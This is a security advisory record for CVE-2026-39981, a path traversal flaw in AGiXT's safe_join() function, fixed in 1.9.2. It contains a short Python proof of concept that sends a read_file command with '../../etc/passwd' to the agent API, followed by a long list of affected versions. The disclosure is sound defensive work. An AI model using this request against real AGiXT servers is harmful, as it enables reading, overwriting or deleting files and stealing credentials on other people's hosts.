GHSA-5gfj-64gh-mgmw

Source

https://github.com/advisories/GHSA-5gfj-64gh-mgmw

Import Source

https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/04/GHSA-5gfj-64gh-mgmw/GHSA-5gfj-64gh-mgmw.json

JSON Data

https://api.osv.dev/v1/vulns/GHSA-5gfj-64gh-mgmw

Aliases

CVE-2026-39981

Published

2026-04-08T20:02:01Z

Modified

2026-04-09T19:18:53.066512Z

Severity

8.8 (High) CVSS_V3 - CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H CVSS Calculator

Summary

AGiXT Vulnerable to Path Traversal in safe_join()

Details

Summary

The safejoin() function in the essentialabilities extension fails to validate that resolved file paths remain within the designated agent workspace. An authenticated attacker can use directory traversal sequences to read, write, or delete arbitrary files on the server hosting the AGiXT instance.

Details

agixt/endpoints/Extension.py:165 (source) -> agixt/XT.py:1035 (hop) -> agixt/extensions/essential_abilities.py:436 (sink)

# source
command_args = command.command_args

# hop
response = await Extensions(...).execute_command(command_name=command_name, command_args=command_args)

# sink
new_path = os.path.normpath(os.path.join(self.WORKING_DIRECTORY, *paths.split("/")))

PoC

# tested on: agixt<=1.9.1
# install: pip install agixt==1.9.1

import requests

BASE = "http://localhost:7437"
TOKEN = "<your_api_key>"

headers = {"Authorization": f"Bearer {TOKEN}"}

payload = {
    "command_name": "read_file",
    "command_args": {
        "filename": "../../etc/passwd"
    }
}

r = requests.post(f"{BASE}/api/agent/MyAgent/command", json=payload, headers=headers)
print(r.text)
# expected output: root:x:0:0:root:/root:/bin/bash ...

Impact

Authenticated users can read, overwrite, or delete arbitrary files on the host server, enabling credential theft, persistent code execution, or denial of service. Authentication is required but no elevated privileges are needed beyond a valid API key.

Database specific

{
    "nvd_published_at": "2026-04-09T18:17:02Z",
    "severity": "HIGH",
    "github_reviewed": true,
    "cwe_ids": [
        "CWE-22"
    ],
    "github_reviewed_at": "2026-04-08T20:02:01Z"
}

References

Affected packages

PyPI / agixt

Package

Name: agixt; View open source insights on deps.dev
Purl: pkg:pypi/agixt

Affected ranges

Type: ECOSYSTEM
Events: Introduced

0Unknown introduced version / All previous versions are affected

Fixed

1.9.2

Affected versions

1.*

1.1.43b0

1.1.44b0

1.1.45b0

1.1.46b0

1.1.47b0

1.1.48b0

1.1.49b0

1.1.50b0

1.1.51b0

1.1.52b0

1.1.54b0

1.1.55b0

1.1.56b0

1.1.57b0

1.1.58b0

1.1.59b0

1.1.60b0

1.1.61b0

1.1.62b0

1.1.63b0

1.1.64b0

1.1.65b0

1.1.66b0

1.1.67b0

1.1.68b0

1.1.69b0

1.1.70b0

1.1.71b0

1.1.72b0

1.1.73b0

1.1.74b0

1.1.75b0

1.1.76b0

1.1.77b0

1.1.78b0

1.1.79b0

1.1.80b0

1.1.81b0

1.1.82b0

1.1.83b0

1.1.84b0

1.2.0b0

1.2.0

1.2.1b0

1.2.3

1.2.4

1.2.5

1.2.6

1.2.7

1.2.8

1.2.9

1.2.10

1.2.11

1.2.12

1.2.13

1.2.14

1.2.15

1.2.16

1.2.17

1.2.18

1.2.19

1.2.20

1.2.21

1.2.23

1.2.24

1.2.25

1.3.0

1.3.1

1.3.2

1.3.3

1.3.4

1.3.5

1.3.6

1.3.7

1.3.8

1.3.9

1.3.10

1.3.11

1.3.12

1.3.13

1.3.14

1.3.15

1.3.16

1.3.17

1.3.18

1.3.19

1.3.20

1.3.21

1.3.22

1.3.23

1.3.24

1.3.25

1.3.26

1.3.27

1.3.28

1.3.29

1.3.30

1.3.31

1.3.32

1.3.33

1.3.34

1.3.35

1.3.36

1.3.37

1.3.38

1.3.39

1.3.40

1.3.41

1.3.42

1.3.43

1.3.44

1.3.45

1.3.46

1.3.47

1.3.48

1.3.49

1.3.50

1.3.51

1.3.52

1.3.53

1.3.54

1.3.55

1.3.56

1.3.57

1.3.58

1.3.59

1.3.60

1.3.61

1.3.62

1.3.63

1.3.64

1.3.65

1.3.66

1.3.67

1.3.68

1.3.69

1.3.70

1.3.71

1.3.72

1.3.73

1.3.74

1.3.75

1.3.76

1.3.77

1.3.78

1.3.79

1.3.80

1.3.81

1.3.82

1.3.83

1.3.84

1.3.85

1.3.86

1.3.87

1.3.88

1.3.89

1.3.90

1.3.91

1.3.92

1.3.93

1.3.94

1.3.95

1.3.96

1.3.97

1.3.98

1.3.99

1.3.100

1.3.101

1.3.102

1.3.103

1.3.104

1.3.105

1.3.106

1.3.107

1.3.108

1.3.109

1.3.110

1.3.111

1.3.112

1.3.113

1.3.114

1.3.115

1.3.116

1.3.117

1.3.118

1.3.119

1.3.120

1.3.121

1.3.122

1.3.123

1.3.124

1.3.125

1.3.126

1.3.127

1.3.128

1.3.129

1.3.130

1.3.131

1.3.132

1.3.133

1.3.134

1.3.135

1.3.136

1.3.137

1.3.138

1.3.139

1.3.140

1.3.141

1.3.142

1.3.143

1.3.144

1.3.145

1.3.146

1.3.147

1.3.148

1.3.149

1.3.150

1.3.151

1.3.152

1.3.153

1.3.154

1.3.155

1.4.0

1.4.1

1.4.2

1.4.3

1.4.4

1.4.5

1.4.6

1.4.7

1.4.8

1.4.9

1.4.10

1.4.11

1.4.12

1.4.13

1.4.14

1.4.15

1.4.16

1.4.17

1.4.18

1.4.19

1.4.20

1.4.21

1.4.22

1.4.24

1.4.25

1.4.26

1.4.27

1.4.28

1.4.29

1.4.30

1.4.31

1.4.32

1.4.33

1.4.34

1.4.35

1.4.36

1.4.37

1.4.38

1.4.39

1.4.40

1.4.41

1.4.42

1.4.43

1.4.44

1.4.45

1.4.46

1.4.47

1.4.48

1.4.49

1.4.50

1.4.51

1.4.52

1.4.53

1.4.54

1.4.55

1.4.57

1.4.58

1.4.59

1.4.60

1.4.61

1.4.62

1.4.63

1.4.64

1.4.65

1.5.0

1.5.1

1.5.2

1.5.3

1.5.4

1.5.5

1.5.6

1.5.7

1.5.8

1.5.9

1.5.10

1.5.11

1.5.12

1.5.13

1.5.14

1.5.15

1.5.16

1.5.17

1.5.18

1.6.0

1.6.1

1.6.2

1.6.3

1.6.5

1.6.6

1.6.7

1.6.8

1.6.9

1.6.10

1.6.11

1.6.12

1.6.13

1.6.14

1.6.15

1.6.16

1.6.17

1.6.18

1.6.19

1.6.20

1.6.21

1.6.22

1.6.23

1.6.24

1.6.25

1.6.26

1.6.27

1.6.28

1.6.29

1.6.30

1.6.31

1.7.0

1.7.1

1.7.2

1.7.3

1.7.4

1.7.5

1.7.6

1.7.7

1.7.8

1.7.9

1.7.10

1.7.11

1.7.12

1.7.13

1.7.14

1.8.0

1.8.1

1.8.2

1.9.0

1.9.1

Database specific

last_known_affected_version_range

"<= 1.9.1"

source

"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/04/GHSA-5gfj-64gh-mgmw/GHSA-5gfj-64gh-mgmw.json"